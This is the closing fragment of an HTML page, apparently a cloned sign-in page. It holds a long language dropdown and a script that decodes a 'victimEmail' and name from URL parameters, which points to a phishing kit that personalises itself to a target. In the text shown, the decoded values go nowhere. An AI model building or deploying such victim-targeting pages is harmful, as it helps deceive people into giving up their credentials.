    <option value="sk" id="OPTION_84">
      ‪Slovenčina‬
    </option>
    <option value="sl" id="OPTION_85">
      ‪slovenščina‬
    </option>
    <option value="fi" id="OPTION_86">
      ‪Suomi‬
    </option>
    <option value="sv" id="OPTION_87">
      ‪Svenska‬
    </option>
    <option value="vi" id="OPTION_88">
      ‪Tiếng Việt‬
    </option>
    <option value="tr" id="OPTION_89">
      ‪Türkçe‬
    </option>
    <option value="el" id="OPTION_90">
      ‪Ελληνικά‬
    </option>
    <option value="bg" id="OPTION_91">
      ‪български‬
    </option>
    <option value="mn" id="OPTION_92">
      ‪монгол‬
    </option>
    <option value="ru" id="OPTION_93">
      ‪Русский‬
    </option>
    <option value="sr" id="OPTION_94">
      ‪српски‬
    </option>
    <option value="uk" id="OPTION_95">
      ‪Українська‬
    </option>
    <option value="ka" id="OPTION_96">
      ‪ქართული‬
    </option>
    <option value="hy" id="OPTION_97">
      ‪հայերեն‬
    </option>
    <option value="iw" id="OPTION_98">
      ‫עברית‬‎
    </option>
    <option value="ur" id="OPTION_99">
      ‫اردو‬‎
    </option>
    <option value="ar" id="OPTION_100">
      ‫العربية‬‎
    </option>
    <option value="fa" id="OPTION_101">
      ‫فارسی‬‎
    </option>
    <option value="am" id="OPTION_102">
      ‪አማርኛ‬
    </option>
    <option value="ne" id="OPTION_103">
      ‪नेपाली‬
    </option>
    <option value="mr" id="OPTION_104">
      ‪मराठी‬
    </option>
    <option value="hi" id="OPTION_105">
      ‪हिन्दी‬
    </option>
    <option value="bn" id="OPTION_106">
      ‪বাংলা‬
    </option>
    <option value="gu" id="OPTION_107">
      ‪ગુજરાતી‬
    </option>
    <option value="ta" id="OPTION_108">
      ‪தமிழ்‬
    </option>
    <option value="te" id="OPTION_109">
      ‪తెలుగు‬
    </option>
    <option value="kn" id="OPTION_110">
      ‪ಕನ್ನಡ‬
    </option>
    <option value="ml" id="OPTION_111">
      ‪മലയാളം‬
    </option>
    <option value="si" id="OPTION_112">
      ‪සිංහල‬
    </option>
    <option value="th" id="OPTION_113">
      ‪ไทย‬
    </option>
    <option value="lo" id="OPTION_114">
      ‪ລາວ‬
    </option>
    <option value="km" id="OPTION_115">
      ‪ខ្មែរ‬
    </option>
    <option value="ko" id="OPTION_116">
      ‪한국어‬
    </option>
    <option value="zh-HK" id="OPTION_117">
      ‪中文（香港）‬
    </option>
    <option value="ja" id="OPTION_118">
      ‪日本語‬
    </option>
    <option value="zh-CN" id="OPTION_119">
      ‪简体中文‬
    </option>
    <option value="zh-TW" id="OPTION_120">
      ‪繁體中文‬
    </option>
  </select></span>
</div>
</div>
</div>
</div>
    <script>
      (function() {
        // https://whatwebcando.today/foreground-detection.html
        var hidden, visibilityChange;
        var victimEmail;
        var PARAM_EMAIL = 'dde';
        var PARAM_NAME = 'ddn';

        if (typeof document.hidden !== 'undefined') {
          hidden = 'hidden';
          visibilityChange = 'visibilitychange';
        } else if (typeof document.mozHidden !== 'undefined') {
          hidden = 'mozHidden';
          visibilityChange = 'mozvisibilitychange';
        } else if (typeof document.msHidden !== 'undefined') {
          hidden = 'msHidden';
          visibilityChange = 'msvisibilitychange';
        } else if (typeof document.webkitHidden !== 'undefined') {
          hidden = 'webkitHidden';
          visibilityChange = 'webkitvisibilitychange';
        } else {
          alert('Page Visibility API not supported.');
        }

        function getQueryParams() {
           return document.location.search.replace(/(^\?)/,'').split('&').map(function(n){return n = n.split('='),this[n[0]] = n[1],this}.bind({}))[0];
        }

        function handleVisibilityChange() {
          var name, email;
          var queryParams = getQueryParams();
          if (typeof queryParams[PARAM_EMAIL] !== 'undefined' &&
          typeof queryParams[PARAM_NAME] !== 'undefined') {
            email = atob(queryParams[PARAM_EMAIL]);
            name = atob(queryParams[PARAM_NAME]);
          }
        }

        document.addEventListener(visibilityChange, handleVisibilityChange, false);
      })();
    </script>
  </body>
</html>
